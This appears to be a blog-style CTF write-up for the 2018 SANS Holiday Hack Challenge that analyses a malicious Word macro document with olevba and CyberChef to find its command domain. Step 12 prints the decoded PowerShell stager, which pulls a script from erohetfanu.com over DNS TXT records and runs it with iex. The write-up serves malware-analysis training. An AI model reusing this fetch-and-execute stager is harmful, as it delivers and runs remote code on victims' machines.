Salaheldin

March 14, 2019

Identify the Domain

Main Challenge @ The 2018 SANS Holiday Hack Challenge [ Kringlecon ]

CTF Writeup

kc18_elves_elf_21.png

Hey, you’re pretty good at this security stuff. Could you help me further with what I suspect is a malicious Word document?

All the elves were emailed a cookie recipe right before all the infections. Take this document with a password of elves and find the domain it communicates with.

icon-idea

Dropper Download

Word docm macros can be extracted using olevba.

Perhaps we can use this to grab the ransomware source.

https://github.com/decalage2/oletools/wiki/olevba


solution-icon.png

1- Recommended watch Chris Davis talk’s about Analyzing PowerShell Malware :
https://www.youtube.com/watch?v=wd12XRq2DNk

2- Download the malicious Word document :

https://www.holidayhackchallenge.com/2018/challenges/CHOCOLATE_CHIP_COOKIE_RECIPE.zip



Alert ! Alert ! Alert !

19-img-1.jpg


3- You can get windows ready virtual machine from here :

https://developer.microsoft.com/en-us/windows/downloads/virtual-machines

or from here

https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/

4- Run the virtual machine and copy zipped malware file to it.

5- Unzip the file CHOCOLATE_CHIP_COOKIE_RECIPE.zip with password elves

6- You will get the malicious Word document CHOCOLATE_CHIP_COOKIE_RECIPE.docm

7- Make sure you have installed Python 2.7 to be able to run the analysis tools :

https://www.python.org/downloads/release/python-2715/

How to install tutorial : https://www.howtogeek.com/197947/how-to-install-python-on-windows/

8- Make sure you have installed Visual Basic Code , it’s easier for read/edit PowerShell scripts: https://code.visualstudio.com/

9- Start the PowerShell from windows menu

10- Install olevba tool : since we will be using Windows 10 VM for this analysis we will install using the following command in your VM terminal :

pip install -U oletools

You can refer to olevba wiki for more details https://github.com/decalage2/oletools/wiki/olevba

11- Let’s extract macro from malware using olevba tool :

  • Change the directory to where you put the malware file then check by using dir :

19-img-2.jpg

  • Run olevba to extract macros from malware file
    olevba CHOCOLATE_CHIP_COOKIE_RECIPE.docm

19-img-3.jpg

  • This the macro malicious PowerShell processor code :

19-code-1.jpg

  • We could use the command it self or use online tool to decode than unzip to readable text format:

Method 1:

Let’s run the command but first we need to modify it, Remove the following:
Then add at the end | Out-File source-1.ps1 to save the result to file , The PowerShell code will be :

19-code-2

Type this code in terminal and run it , then check the file source-1.ps1 by using ls command.

19-img-4.jpg

Let’s look at source-1.ps1 : type .\source-1.ps1

19-img-5.jpg


Method 2:
Using online converter “CyberChef” , Copy the base64 code to input filed > select from base64 option and raw inflate option:

19-img-6.jpg

Copy the result to new file in Visual Basic Code and save it to as source-1.ps1


12- As you can see from both methods It’s retrieve more PowerShell scripts to run,
function H2A($a) {$o; $a -split ‘(..)’ | ? { $_ } | forEach {[char]([convert]::toint16($_,16))} | forEach {$o = $o + $_}; return $o}; $f = “77616E6E61636F6F6B69652E6D696E2E707331”; $h = “”; foreach ($i in 0..([convert]::ToInt32((Resolve-DnsName -Server erohetfanu.com -Name “$f.erohetfanu.com” -Type TXT).strings, 10)-1)) {$h += (Resolve-DnsName -Server erohetfanu.com -Name “$i.$f.erohetfanu.com” -Type TXT).strings}; iex($(H2A $h | Out-string))

And it’s communicate with the domain erohetfanu.com to download the PowerShell script with code 77616E6E61636F6F6B69652E6D696E2E707331 which we decoded before to wannacookie.min.ps1 .


📟 Go to your Badge > Objectives > Enter erohetfanu.com

kc18_elves_elf_21.png

Erohetfanu.com, I wonder what that means?